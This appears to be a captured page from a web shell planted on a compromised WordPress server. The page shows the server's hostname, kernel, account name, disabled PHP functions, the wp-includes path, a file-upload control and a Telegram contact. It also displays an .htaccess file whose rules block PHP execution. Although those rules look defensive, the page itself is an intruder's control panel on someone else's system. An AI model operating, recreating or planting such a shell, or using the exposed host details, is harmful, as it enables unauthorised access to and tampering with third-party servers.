HEX
Server: Apache
System: Linux 95-217-38-122.cprapid.com 5.14.0-427.33.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 30 09:45:56 EDT 2024 x86_64
User: targetplatform (1004)
PHP: 8.1.33
Disabled: exec,passthru,shell_exec,system
$ pwd: /mnt/data/targetplatform/public_html/en/wp-includes/
Upload Files
File: /mnt/data/targetplatform/public_html/en/wp-includes/.htaccess
# Block PHP execution in wp-content/uploads/ directory
<Files *.php>
    Deny from all
</Files>

# Allow access to images and other file types in the uploads folder
<FilesMatch "\.(jpg|jpeg|png|gif|bmp|tiff|svg|webp|pdf|zip|mp4|mp3|txt|csv)$">
    Order Allow,Deny
    Allow from all
</FilesMatch>

# Prevent directory browsing (index listing) in uploads
Options -Indexes

# Block malicious file uploads (like PHP, .exe, .bash, etc.)
<FilesMatch "\.(php|phtml|php3|php4|php5|php7|php8|exe|pl|py|bash)$">
    Deny from all
</FilesMatch>

# Additional protection for uploaded files with potential malicious content
<IfModule mod_headers.c>
    # Prevent browsers from executing files that shouldn't be executed (like .jpg, .png, etc.)
    Header set X-Content-Type-Options "nosniff"
</IfModule>
@ Telegram